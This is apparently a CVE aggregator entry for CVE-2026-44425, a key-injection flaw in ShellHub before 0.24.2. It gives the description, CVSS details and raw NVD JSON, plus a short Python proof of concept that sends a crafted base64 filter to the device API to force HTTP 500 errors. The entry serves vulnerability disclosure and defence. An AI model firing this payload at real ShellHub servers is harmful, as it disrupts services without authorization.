Security Vulnerability Report
中文
CVE-2026-44425 CVSS 5.4 MEDIUM

CVE-2026-44425

Published: 2026-05-13 22:16:44
Last Modified: 2026-05-14 16:44:56
Source: [email protected]

Description

ShellHub is a centralized SSH gateway. Prior to 0.24.2, the device list endpoint accepts user-controlled identifiers in the the name field of each filter property in the base64-encoded filter query parameter and the sort_by query parameter, which are then passed directly as BSON/SQL keys in the database layer without validation. Any authenticated user can craft payloads that cause the aggregation / query to fail and the API to return HTTP 500 with no body, with no rate limiting applied. This vulnerability is fixed in 0.24.2.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

No configuration data available.

ShellHub < 0.24.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import base64 import json def exploit_shellhub_dos(target_url, token): """ PoC for CVE-2026-44425 Exploits the lack of validation in the 'filter' parameter. """ headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Malicious payload targeting the BSON key injection # Injecting a '$' into a key name often causes parsing issues if not validated malicious_payload = { "name": "$invalid_operator" } # Encode payload to base64 as required by the API encoded_payload = base64.b64encode(json.dumps(malicious_payload).encode()).decode() params = { "filter": encoded_payload } try: print(f"[+] Sending malicious request to {target_url}/api/devices...") response = requests.get(f"{target_url}/api/devices", headers=headers, params=params) if response.status_code == 500: print("[+] Exploit successful! Server returned HTTP 500 (Internal Server Error).") print("[+] The service is likely experiencing a Denial of Service.") else: print(f"[-] Exploit failed. Server returned status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with actual target and token TARGET = "http://localhost:8080" TOKEN = "valid_user_token" exploit_shellhub_dos(TARGET, TOKEN)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44425", "sourceIdentifier": "[email protected]", "published": "2026-05-13T22:16:44.400", "lastModified": "2026-05-14T16:44:55.820", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "ShellHub is a centralized SSH gateway. Prior to 0.24.2, the device list endpoint accepts user-controlled identifiers in the the name field of each filter property in the base64-encoded filter query parameter and the sort_by query parameter, which are then passed directly as BSON/SQL keys in the database layer without validation. Any authenticated user can craft payloads that cause the aggregation / query to fail and the API to return HTTP 500 with no body, with no rate limiting applied. This vulnerability is fixed in 0.24.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-943"}, {"lang": "en", "value": "CWE-1333"}]}], "references": [{"url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-47r2-v3x6-wff9", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.